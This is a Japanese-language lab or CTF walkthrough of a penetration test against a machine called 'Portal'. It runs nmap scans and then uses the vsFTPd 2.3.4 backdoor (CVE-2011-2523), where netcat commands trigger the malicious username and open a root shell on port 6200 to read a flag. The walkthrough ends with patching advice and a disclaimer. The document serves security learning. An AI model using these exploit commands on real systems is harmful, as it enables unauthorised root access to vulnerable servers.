
"Portal"マシンに対する詳細なペネトレーションテストのチュートリアルおよびエクスプロイト報告書であり、CVE-2011-2523 (vsFTPd 2.3.4 バックドア) に焦点を当ててルートアクセスを達成する。
⚠️ このプロジェクトは教育および許可されたテスト目的のみです。
システムへの不正アクセスは固く禁止されています。
SYAFIQ
役割: リードペネトレーションテスター
| フェーズ | ツール | 説明 |
|---|---|---|
| 発見 | Nmap | ネットワークをスキャンして稼働中のホストを特定 |
| 列挙 | Nmap | サービスとバージョンを特定 |
| 分析 | NSEスクリプト | 既知の脆弱性を検出 |
| エクスプロイト | Netcat | バックドアを発動 |
| ポストエクスプロイト | ターミナル | rootアクセスを取得しフラグを取得 |
ネットワーク内のアクティブホストをスキャン:
nmap -sn --unprivileged 10.150.150.10-30
✅ 結果:
-8台のホストを検出 -ターゲットを特定: 10.150.150.12
開いているポートとサービスをスキャン:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ 発見事項:
-ポート21 → FTP (vsftpd) -ポート22 → SSH (OpenSSH 8.2p1)
既知のFTPバックドア脆弱性を確認:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 結果:
-ターゲットは脆弱 -CVE-2011-2523 確認
悪意のあるユーザー名を使用してバックドアを発動:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ これにより、ポート6200に隠されたrootシェルが開きます
バックドアに接続し、コマンドを実行:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
ルートアクセスを取得 uid=0(root) 確認
🏁 フラグ獲得:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
古くなったサービスは常に更新する (vsFTPdは脆弱だった) 設定ミスのあるサービスはシステム全体の侵害につながる可能性がある 簡単なスキャンで重大な脆弱性が明らかになる -🛡️ 推奨事項 -🔄 FTPサービスを最新バージョンに更新 -🚫 不要なサービスを無効化 -🔐 ファイアウォールを使用してアクセスを制限 -📊 定期的なセキュリティ監査を実施 -📚 免責事項
サイバーセキュリティの学習 倫理的ハッキングの実践 許可されたペネトレーションテスト
❌ この知識を違法行為に使用しないでください。
「セキュリティは製品ではなく、プロセスである。」 — 常にテスト、監視、改善を続けよう。